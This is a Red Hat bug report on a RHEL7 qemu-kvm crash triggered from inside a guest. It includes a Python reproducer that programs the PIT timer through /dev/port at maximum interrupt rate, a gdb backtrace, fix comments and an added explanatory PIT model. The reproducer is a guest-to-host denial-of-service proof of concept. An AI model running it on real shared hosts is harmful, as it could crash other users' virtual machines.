Bug 954306

Summary: rhel7 guest core dumped when DDOS by high frequency of pit timer
Product: Red Hat Enterprise Linux 7
Reporter: ShupingCui <scui>
Component: qemu-kvm
Assignee: Marcelo Tosatti <mtosatti>
Status: CLOSED CURRENTRELEASE
QA Contact: Virtualization Bugs <virt-bugs>
Severity: high
Docs Contact:
Priority: medium
Version: 7.0
CC: acathrow, hhuang, juzhang, knoel, mazhang, michen, mrezanin, virt-maint
Target Milestone: rc
Target Release: ---
Hardware: Unspecified
OS: Unspecified
Whiteboard:
Fixed In Version: qemu-kvm-1.5.0-1.el7
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2014-06-13 11:09:29 UTC
Type: Bug
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:
Attachments:
  gdb info (flags: none)

Comment 1 ShupingCui 2013-04-22 08:30:49 UTC
Created attachment 738456 [details]
gdb info

Comment 3 Hai Huang 2013-04-22 14:05:35 UTC
Please feel free to reassign this BZ as appropriate.  Thanks.

Comment 4 Miroslav Rezanina 2013-05-24 06:19:04 UTC
Build in qemu-kvm-1.5.0-1.el7

Comment 5 mazhang 2014-01-03 08:11:27 UTC
Reproduced this bug.

Host:
qemu-kvm-1.4.0-4.el7.x86_64
kernel-3.10.0-64.el7.x86_64

Guest:
RHEL7-64

Cli:
gdb --args /usr/libexec/qemu-kvm \
-M pc \
-cpu Opteron_G1 \
-m 8G \
-smp 4,sockets=2,cores=2,threads=1,maxcpus=16 \
-enable-kvm \
-name rhel7-64 \
-uuid 990ea161-6b67-47b2-b803-19fb01d30d12 \
-smbios type=1,manufacturer='Red Hat',product='RHEV Hypervisor',version=el6,serial=koTUXQrb,uuid=feebc8fd-f8b0-4e75-abc3-e63fcdb67170 \
-k en-us \
-rtc base=localtime,clock=host,driftfix=slew \
-nodefaults \
-monitor stdio \
-qmp tcp:0:6666,server,nowait \
-boot menu=on \
-bios /usr/share/seabios/bios.bin \
-vga qxl \
-spice port=5900,disable-ticketing \
-chardev socket,id=seabioslog,path=/tmp/seabios,server,nowait \
-device isa-debugcon,chardev=seabioslog,iobase=0x402 \
-monitor unix:/tmp/guest-sock,server,nowait \
-drive file=/home/rhel7-64.raw,if=none,id=drive-ide0-0-1,format=raw,cache=none,aio=threads \
-device ide-drive,bus=ide.1,unit=0,drive=drive-ide0-0-1,id=ide0-0-1,bootindex=0 \
-netdev tap,id=hostnet0,vhost=on \
-device virtio-net-pci,netdev=hostnet0,id=net0,mac=52:54:00:39:13:2c \
-device virtio-balloon-pci,id=balloon0 \

Steps:
Execute the following python script in guest:
import struct

# /dev/port is the raw x86 I/O port space; opening it needs root (CAP_SYS_RAWIO).
f = open("/dev/port", "r+b", 0)

def outb(port, data):
    # Seeking to the port number and writing one byte issues an OUT to that port.
    f.seek(port)
    f.write(struct.pack("B", data))

outb(0x43, 0x34)  # PIT command word: channel 0, lobyte/hibyte access, mode 2 (rate generator), binary
outb(0x40, 0x1)   # reload value, low byte
outb(0x40, 0x0)   # reload value, high byte: count = 1, so IRQ0 fires at the 1.19 MHz input clock rate

Result:
qemu-kvm core dumped.

(gdb) bt
#0  0x0000000000000000 in ?? ()
#1  0x0000555555769f8c in memory_region_read_accessor (opaque=0x5555564daf68, addr=<optimized out>, 
    value=0x7fffea7bab60, size=1, shift=0, mask=255) at /usr/src/debug/qemu-1.4.0/memory.c:316
#2  0x00005555557698f2 in access_with_adjusted_size (addr=addr@entry=0, value=value@entry=0x7fffea7bab60, size=1, 
    access_size_min=<optimized out>, access_size_max=<optimized out>, 
    access=access@entry=0x555555769f40 <memory_region_read_accessor>, opaque=opaque@entry=0x5555564daf68)
    at /usr/src/debug/qemu-1.4.0/memory.c:364
#3  0x000055555576aef8 in memory_region_iorange_read (iorange=0x5555564db2d0, offset=0, width=1, data=0x7fffea7bab60)
    at /usr/src/debug/qemu-1.4.0/memory.c:409
#4  0x0000555555764ee7 in ioport_readb_thunk (opaque=<optimized out>, addr=<optimized out>)
    at /usr/src/debug/qemu-1.4.0/ioport.c:186
#5  0x00005555557657b1 in ioport_read (address=126, index=0) at /usr/src/debug/qemu-1.4.0/ioport.c:70
#6  cpu_inb (addr=addr@entry=126) at /usr/src/debug/qemu-1.4.0/ioport.c:309
#7  0x0000555555767b7b in kvm_handle_io (count=1, size=1, direction=0, data=<optimized out>, port=126)
    at /usr/src/debug/qemu-1.4.0/kvm-all.c:1414
#8  kvm_cpu_exec (env=env@entry=0x55555650cde0) at /usr/src/debug/qemu-1.4.0/kvm-all.c:1581
#9  0x0000555555714741 in qemu_kvm_cpu_thread_fn (arg=0x55555650cde0) at /usr/src/debug/qemu-1.4.0/cpus.c:759
#10 0x00007ffff625cde3 in start_thread () from /lib64/libpthread.so.0
#11 0x00007ffff3bf526d in clone () from /lib64/libc.so.6
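Added illustration (not the reporter's script and not QEMU's i8254 code): the three port writes in the reproducer above are opaque bytes unless you know the 8254 command-word layout. The model below decodes the command word written to port 0x43, tracks the lobyte/hibyte count write sequence on port 0x40, and computes the resulting IRQ0 rate, which is what makes count = 1 a denial-of-service against the hypervisor's timer path. The 1193182 Hz base clock is the standard PC PIT input clock; the class and function names, the power-on defaults and the REPRODUCER_WRITES list are this example's own constructions.

```python
PIT_BASE_HZ = 1193182  # standard PC 8254 input clock, ~1.193 MHz

# Constructed copy of the three outb() calls from the reproducer script above.
REPRODUCER_WRITES = [(0x43, 0x34), (0x40, 0x01), (0x40, 0x00)]

MODE_NAMES = {0: "interrupt on terminal count", 1: "hardware one-shot",
              2: "rate generator", 3: "square wave generator",
              4: "software strobe", 5: "hardware strobe"}


def decode_command(byte):
    """Decode an 8254 mode/command word as written to port 0x43."""
    channel = (byte >> 6) & 0x3   # 0-2 select a counter, 3 is the read-back command
    access = (byte >> 4) & 0x3    # 0 = latch, 1 = low byte, 2 = high byte, 3 = low then high byte
    mode = (byte >> 1) & 0x7      # bit 3 is a don't-care for modes 2 and 3
    if mode in (6, 7):
        mode -= 4
    return {"channel": channel, "access": access, "mode": mode, "bcd": bool(byte & 0x1)}


class PitChannel0:
    """Minimal model of the 8254 channel 0 write path (ports 0x43 and 0x40) for this example only."""

    def __init__(self):
        self.access = 3            # defaults chosen for this model, not taken from any firmware
        self.mode = 3
        self.count = 0             # programmed reload value; 0 means 65536 on the 8254
        self._pending_lo = None    # first byte of a lobyte/hibyte pair, waiting for the second

    def outb(self, port, data):
        if not 0 <= data <= 0xFF:
            raise ValueError("outb takes one byte")
        if port == 0x43:
            cmd = decode_command(data)
            if cmd["channel"] != 0 or cmd["access"] == 0:
                return             # other counters, read-back and latch commands are not modelled
            self.access, self.mode = cmd["access"], cmd["mode"]
            self._pending_lo = None   # a new command word restarts the low/high write sequence
        elif port == 0x40:
            self._write_count(data)
        else:
            raise ValueError("port 0x%02x is not a channel 0 PIT port" % port)

    def _write_count(self, data):
        if self.access == 1:
            self.count = data
        elif self.access == 2:
            self.count = data << 8
        elif self._pending_lo is None:
            self._pending_lo = data
        else:
            self.count = (data << 8) | self._pending_lo
            self._pending_lo = None

    def reload_value(self):
        return 65536 if self.count == 0 else self.count

    def output_hz(self):
        """IRQ0 rate for the programmed count; the 8254 datasheet calls a count of 1 illegal in mode 2,
        so an emulator has to cope with a value real firmware never programs."""
        return PIT_BASE_HZ / self.reload_value()

    def describe(self):
        return "mode %d (%s), reload %d -> %.1f Hz" % (
            self.mode, MODE_NAMES[self.mode], self.reload_value(), self.output_hz())


def replay(writes):
    """Apply a list of (port, byte) writes to a fresh channel 0 model and return it."""
    pit = PitChannel0()
    for port, data in writes:
        pit.outb(port, data)
    return pit


if __name__ == "__main__":
    # The reproducer programs a rate generator with reload 1: one IRQ0 per input clock tick.
    print(replay(REPRODUCER_WRITES).describe())
    # For comparison, the same command word with a count of 0 gives the classic 18.2 Hz tick.
    print(replay([(0x43, 0x34), (0x40, 0x00), (0x40, 0x00)]).describe())
```

The replay makes the scale of the problem concrete: reload 1 asks the emulated timer for roughly 1.19 million interrupts per second, 65536 times the rate a count of 0 produces, and every one of those ticks has to be serviced by the hypervisor on behalf of an unprivileged-to-the-host guest.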

Comment 7 Marcelo Tosatti 2014-01-03 13:40:34 UTC
Should be fixed in qemu-kvm-1.5.3-21.el7.

(In reply to mazhang from comment #5)
> Reproduced this bug.
> 
> Host:
> qemu-kvm-1.4.0-4.el7.x86_64
> kernel-3.10.0-64.el7.x86_64

Please attempt to use 

qemu-kvm-1.5.0-1.el7

or newer.


Comment 10 mazhang 2014-01-06 03:10:12 UTC
Updated the host kernel package to the one provided in comment 9 and re-tested; the host no longer kernel panics.

Comment 15 Ludek Smid 2014-06-13 11:09:29 UTC
This request was resolved in Red Hat Enterprise Linux 7.0.

Contact your manager or support representative in case you have further questions about the request.